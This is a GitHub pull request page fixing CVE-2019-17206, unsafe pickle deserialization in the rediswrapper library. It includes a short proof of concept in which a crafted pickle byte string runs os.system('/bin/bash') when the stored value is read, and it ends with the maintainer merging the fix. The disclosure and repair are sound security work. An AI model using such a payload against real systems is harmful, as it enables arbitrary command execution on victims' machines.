Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Fix CVE-2019-17206 #1

Merged
merged 2 commits into from Oct 5, 2019
Merged

Fix CVE-2019-17206 #1

merged 2 commits into from Oct 5, 2019

Conversation

0x2b3bfa0
Copy link
Contributor

@0x2b3bfa0 0x2b3bfa0 commented Oct 4, 2019

CVE-2019-17206

Description

Uncontrolled deserialization of a pickled object in models.py in Frost Ming rediswrapper (aka Redis Wrapper) before 0.3.0 allows attackers to execute arbitrary scripts.

Proof of Concept

import rediswrapper

# Initialize the server connection.
storage = rediswrapper.RedisDict()

# Store a pickle payload as if it were a simple bytes object.
storage['element'] = b"\x80\x03cos\nsystem\n(S'/bin/bash'\ntR."

# Retrieve the value in order to trigger the vulnerability.
print(storage['element'])

@coveralls
Copy link

Coverage Status

Coverage increased (+0.7%) to 96.961% when pulling f242125 on 0x2b3bfa0:patch-1 into 45b6364 on frostming:master.

1 similar comment
@coveralls
Copy link

Coverage Status

Coverage increased (+0.7%) to 96.961% when pulling f242125 on 0x2b3bfa0:patch-1 into 45b6364 on frostming:master.

@frostming frostming merged commit 748f60b into frostming:master Oct 5, 2019
@frostming
Copy link
Owner

Thanks for taking care of this, will publish a new release shortly.

@0x2b3bfa0
Copy link
Contributor Author

You're welcome!

@0x2b3bfa0 0x2b3bfa0 changed the title Quick fix for CVE Request 766166 Fix CVE-2019-17206 Jan 15, 2020
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Projects
None yet
Development

Successfully merging this pull request may close these issues.

None yet

3 participants